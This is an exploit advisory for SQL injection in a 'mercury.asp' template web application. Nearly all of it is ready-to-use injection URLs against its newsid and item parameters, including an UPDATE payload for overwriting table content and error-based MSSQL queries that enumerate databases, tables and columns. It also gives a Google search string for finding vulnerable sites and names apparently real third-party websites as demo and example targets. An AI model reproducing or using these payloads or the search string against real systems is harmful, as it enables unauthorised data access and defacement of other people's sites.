MERCURY/Templates mercury.ASP SQL Injection
Credit : Code[Xp]Loder'tq
mail : codexploder[at]hotmail[dot]com
site : Biyosecurity.net,expw0rm.com
thx : BiyoSecurityTeam
#####################################################
1-) example.com/[patch]/mercury.asp?page_id=1&newsid=(sql methot)
1-) example.com/templates/mercury.asp?page_id=1&newsid=(sql methot)
2-) example.com/[patch]/mercury.asp?page_id=2&item=(sql methot)
2-) example.com/templates/mercury.asp?page_id=2&item=(sql methot)
2-) example.com/templates/mercury.asp?page_id=2&item=1'
2-) example.com/templates/mercury.asp?page_id=2&item=1 having 1=1
2-) example.com/templates/mercury.asp?page_id=2&item=1,2,3,4,5
2-) example.com/templates/mercury.asp?page_id=2&item=1,2,3,4,5+update+tbl+set+column='your text or meta code';–
2-) example.com/templates/mercury.asp?page_id=2&item=1 group by tbl.column having 1=1
#for db : convert(int, db_name(1)
: convert(int, db_name(2)
#for other tbl : convert(int, (select top 1 name from sysobjects where xtype='U' and name>'TABLE'))
#for other column : convert(int, (select top 1 name from syscolumns where colid=COLUMNID and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))
#tbl : V_news_LASTVERSION
#column : title,pictures,date,email,vs
##########################################################
demo site: http://www.pyxis-discovery.com/
google search code : inurl:"mercury.asp?page_id"
example site : http://www.radtech-europe.com